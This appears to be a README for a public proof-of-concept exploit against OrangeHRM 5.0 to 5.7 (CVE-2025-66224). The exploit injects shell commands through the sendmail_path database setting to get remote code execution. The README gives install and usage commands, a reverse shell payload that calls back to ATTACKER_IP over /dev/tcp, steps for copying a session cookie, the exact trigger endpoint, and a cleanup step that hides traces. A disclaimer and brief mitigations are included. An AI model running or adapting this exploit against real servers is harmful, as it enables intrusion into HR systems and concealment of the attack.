Share
## https://sploitus.com/exploit?id=86ACB05D-000A-5E78-88BD-E9E193AAB184
# OrangeHRM RCE Exploit - CVE-2025-66224

## ๐Ÿ“‹ Description

This Proof of Concept (PoC) demonstrates a Remote Code Execution (RCE) vulnerability in OrangeHRM through command injection in the `sendmail_path` configuration parameter.

The exploit works by:
1. Injecting a malicious payload into the MySQL database (`hs_hr_config` table)
2. Triggering the payload execution via the email configuration API endpoint
3. Automatically restoring the original value to clean up traces

## ๐ŸŽฏ Affected Versions

- OrangeHRM version 5.0 to 5.7

## โš ๏ธ Disclaimer

This tool is provided for **educational and authorized security testing purposes only**. Unauthorized access to computer systems is illegal. The authors are not responsible for any misuse or damage caused by this tool.

## ๐Ÿ”ง Requirements

```bash
pip install requests mysql-connector-python
```

## ๐Ÿ“ฆ Installation

```bash
git clone https://github.com/richard-natan/PoC-CVE-2025-66224
cd PoC-CVE-2025-66224
pip install -r requirements.txt
```

## ๐Ÿš€ Usage

### Step 1: Obtain Session Cookie

1. Log in to OrangeHRM through the web interface
2. Open browser Developer Tools (F12)
3. Navigate to **Storage** > **Cookies** (Firefox) or **Application** > **Cookies** (Chrome)
4. Copy the `_orangehrm` cookie value

### Step 2: Run the Exploit

```bash
python3 exploit.py -t  -c  \
    -dh  -du  -dp  \
    -cmd ''
```

### Example - Simple Command

```bash
python3 exploit.py -t http://127.0.0.1:8080/ \
    -c "g58tak8pbnheseatv6dggvi31i" \
    -dh 172.18.0.2 \
    -du orange_user \
    -dp orange_password \
    -cmd "touch /tmp/pwned"
```

### Example - Reverse Shell

```bash
# Start listener on attacker machine
nc -lvnp 4444

# Execute exploit with reverse shell payload
python3 exploit.py -t http://target.com/ \
    -c "your_session_cookie" \
    -dh 172.18.0.2 \
    -du orange_user \
    -dp orange_password \
    -cmd 'bash -c "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"'
```

## ๐Ÿ“ Parameters

| Parameter | Short | Required | Description |
|-----------|-------|----------|-------------|
| `--target` | `-t` | โœ… | Target URL (e.g., http://target.com) |
| `--cookie` | `-c` | โœ… | Session cookie value |
| `--cookie_name` | `-cn` | โŒ | Cookie name (default: _orangehrm) |
| `--command` | `-cmd` | โœ… | Command to execute on target |
| `--db_host` | `-dh` | โœ… | MySQL host address |
| `--db_user` | `-du` | โœ… | MySQL username |
| `--db_pass` | `-dp` | โœ… | MySQL password |
| `--db_port` | `-dport` | โŒ | MySQL port (default: 3306) |

## ๐Ÿ” How It Works

### Vulnerability Details

The vulnerability exists in the email configuration functionality where the `sendmail_path` parameter is stored in the database and later executed without proper sanitization.

**Exploitation Flow:**

```
1. Authenticate to OrangeHRM (obtain valid session cookie)
   โ†“
2. Connect to MySQL database
   โ†“
3. Locate hs_hr_config table
   โ†“
4. Update email_config.sendmail_path value:
   FROM: /usr/sbin/sendmail -bs
   TO:   /usr/sbin/sendmail -bs &&  #
   โ†“
5. Trigger execution via API:
   PUT /web/index.php/api/v2/admin/email-configuration
   โ†“
6. Command executes on server
   โ†“
7. Restore original value (cleanup)
```

### Technical Details

**Vulnerable Parameter:** `email_config.sendmail_path`

**Database:** 
- Table: `hs_hr_config`
- Column: `name` = 'email_config.sendmail_path'
- Column: `value` = sendmail command path

**Trigger Endpoint:** 
```
PUT /web/index.php/api/v2/admin/email-configuration
```

## ๐Ÿ›ก๏ธ Mitigation

1. **Input Validation:** Implement strict validation for the `sendmail_path` parameter
2. **Escaping:** Properly escape shell commands before execution
3. **Least Privilege:** Run web server with minimal privileges
4. **Update:** Apply the latest security patches for OrangeHRM

## ๐Ÿค Credits

**PoC by:** RiccK

**Team:** Bypassadores && HackersOnSteroids

## ๐Ÿ”— References

- [CVE-2025-66224](https://nvd.nist.gov/vuln/detail/CVE-2025-66224)

---

**โš ๏ธ Use responsibly. Always obtain proper authorization before testing.**